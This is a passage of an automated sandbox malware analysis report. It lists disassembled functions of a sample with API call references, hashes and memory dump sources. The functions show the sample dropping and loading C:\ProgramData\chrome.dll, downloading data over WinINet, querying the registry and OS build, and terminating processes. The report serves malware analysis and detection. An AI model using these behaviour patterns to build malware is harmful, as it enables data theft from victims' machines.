                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: fafeaa2ee3f9e5242fddcf99c70eda3747e75fc70507b956a222e87a81a55c53
                                  • Instruction ID: 4da395c4d7706a46e975f476889adc52a458e57d63e034a00376fe4333b85a0b
                                  • Opcode Fuzzy Hash: fafeaa2ee3f9e5242fddcf99c70eda3747e75fc70507b956a222e87a81a55c53
                                  • Instruction Fuzzy Hash: 2BF05E3291C209EFD3449FE0EC4DFACFB30EB04707F214599F61996790C671AA80AB55
                                  Function 006C08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006C9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,006C08DC,C:\ProgramData\chrome.dll), ref: 006C9871
                                    • Part of subcall function 006BA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 006BA098
                                  • StrCmpCA.SHLWAPI(00000000,01479038), ref: 006C0922
                                  • StrCmpCA.SHLWAPI(00000000,014790C8), ref: 006C0B79
                                  • StrCmpCA.SHLWAPI(00000000,01478FF8), ref: 006C0A0C
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 006C0C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 006C0C30
                                  • C:\ProgramData\chrome.dll, xrefs: 006C08CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: 767bcb8f41b397d10aea242884de2fdf14aefb00a787105c24a07119f04485fc
                                  • Instruction ID: d2ebc050f2abac2a9c481f4be65d6cb40d055a42e840a22b58b86c4e957b4a0f
                                  • Opcode Fuzzy Hash: 767bcb8f41b397d10aea242884de2fdf14aefb00a787105c24a07119f04485fc
                                  • Instruction Fuzzy Hash: 8AA13F71A001089FCB68EFA4DA96FBD776AEF95304F50816DE40A4F252DA309A05CB96
                                  Function 0072F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 0072FA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0072FA27
                                  • _ValidateLocalCookies.LIBCMT ref: 0072FAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0072FADB
                                  • _ValidateLocalCookies.LIBCMT ref: 0072FB30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: b59b23398ba7f618ec0c78ec154abafcf179074e732ec5e45d75622acdeddcca
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: 4441C534A00228EFCF10EF68D884A9E7BB5FF4A314F14C175E918AB392D7399905CB91
                                  Function 006B5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006B501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B5021
                                  • InternetOpenA.WININET(006D0DE3,00000000,00000000,00000000,00000000), ref: 006B503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 006B5061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 006B5091
                                  • InternetCloseHandle.WININET(?), ref: 006B5109
                                  • InternetCloseHandle.WININET(?), ref: 006B5116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: d0037ca48470e672225bd566e1f95a8acac24cd8914b20b6f924028fc124961c
                                  • Instruction ID: a564ec3a98cf4aae8b683069f7e68bc1a164fc4e6d797d6a3f231c283e6b576e
                                  • Opcode Fuzzy Hash: d0037ca48470e672225bd566e1f95a8acac24cd8914b20b6f924028fc124961c
                                  • Instruction Fuzzy Hash: 7C31F9F4A44218ABDB20DF94DC85BDDB7B5AB48304F2081D9F609A7381D7706EC59F98
                                  Function 006C8290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0147E320,00000000,?,006D0E14,00000000,?,00000000), ref: 006C82C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C82C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006C82E8
                                  • wsprintfA.USER32 ref: 006C833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2922868504-3474575989
                                  • Opcode ID: 0ad7194c0f5041b8f9d90583ff6c206766a66ee9b32e0acf1c7f58f1d9314d53
                                  • Instruction ID: 93ce0f839d67a0ea713c0cee887d1f9ebac9264d3fb841597b97960189eeb307
                                  • Opcode Fuzzy Hash: 0ad7194c0f5041b8f9d90583ff6c206766a66ee9b32e0acf1c7f58f1d9314d53
                                  • Instruction Fuzzy Hash: 2021F7B1E58209ABDB10DFD4CC49FBEB7B9FB44B10F20451DF615AB280D778A9018BA5
                                  Function 006C856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006C85B6
                                  • wsprintfA.USER32 ref: 006C85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006C860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C8629
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,0147E398,00000000,000F003F,?,00000400), ref: 006C867C
                                  • lstrlen.KERNEL32(?), ref: 006C8691
                                  • RegQueryValueExA.ADVAPI32(00000000,0147E3F8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006D0B3C), ref: 006C8729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C8798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C87AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 714c5e2a70384cdc7c6a96accecec0262f6958786e41a9806dbb66d6c86fff18
                                  • Instruction ID: 99dac7227c744b9bfd228769706bf5e01428b1e9b99c8379cf1cc7cbae07a792
                                  • Opcode Fuzzy Hash: 714c5e2a70384cdc7c6a96accecec0262f6958786e41a9806dbb66d6c86fff18
                                  • Instruction Fuzzy Hash: CA211B7191421C9FDB24DB94DC85FE9B3B9FB48704F1081D8E609A7280DF71AA85DFA4
                                  Function 006C99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C99C5
                                  • Process32First.KERNEL32(006BA056,00000128), ref: 006C99D9
                                  • Process32Next.KERNEL32(006BA056,00000128), ref: 006C99F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C9A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C9A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 006C9A79
                                  • CloseHandle.KERNEL32(006BA056), ref: 006C9A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 3a1cb3f5522320bd3e7d3a4aea5ded342ac039cedf6f7d96c112f031d3610e79
                                  • Instruction ID: 33501061af02ae0349a753defc54c0eb2418fd6528896c22cc6b48647b22927d
                                  • Opcode Fuzzy Hash: 3a1cb3f5522320bd3e7d3a4aea5ded342ac039cedf6f7d96c112f031d3610e79
                                  • Instruction Fuzzy Hash: F521E971918218EBDB25DFA1DC8CBEDB7B5FB48700F104188E509A6290D7749A84DFA0
                                  Function 006C7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0146BE88,00000000,00020119,00000000), ref: 006C786D
                                  • RegQueryValueExA.ADVAPI32(00000000,0147E1D0,00000000,00000000,?,000000FF), ref: 006C788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 006C7898
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: ab14f75cb4b0a22cbd0b7e35b91ea914910b9a4fd29de27ea1a86bd09b854a65
                                  • Instruction ID: e76fdaec1e00107f03369674b94610413907acb05cee6054941e1f8f2fb778ec
                                  • Opcode Fuzzy Hash: ab14f75cb4b0a22cbd0b7e35b91ea914910b9a4fd29de27ea1a86bd09b854a65
                                  • Instruction Fuzzy Hash: FC01FF75A5D305BBEB00DBE4DD49FAEB779EB48700F104098FA15AB391D7709900DB90
                                  Function 006C78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C78C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C78CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0146BE88,00000000,00020119,006C7849), ref: 006C78EB
                                  • RegQueryValueExA.ADVAPI32(006C7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006C790A
                                  • RegCloseKey.ADVAPI32(006C7849), ref: 006C7914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: bf3dbd7c1b5fb9cd661a77404e35a1f528ba5f36e6f0185378b2aea99c98224c
                                  • Instruction ID: 503bb596b34f536a6a37cfbd96751f755ed658082548c0cbd43ff1d1fe40c898
                                  • Opcode Fuzzy Hash: bf3dbd7c1b5fb9cd661a77404e35a1f528ba5f36e6f0185378b2aea99c98224c
                                  • Instruction Fuzzy Hash: 9F0117B5A58309BFEB10DBD4DC49FAEB778EB44700F104599F615A7391D7709A00DB90
                                  Function 006C9470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(>=l,80000000,00000003,00000000,00000003,00000080,00000000,?,006C3D3E,?), ref: 006C948C
                                  • GetFileSizeEx.KERNEL32(000000FF,>=l), ref: 006C94A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 006C94B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
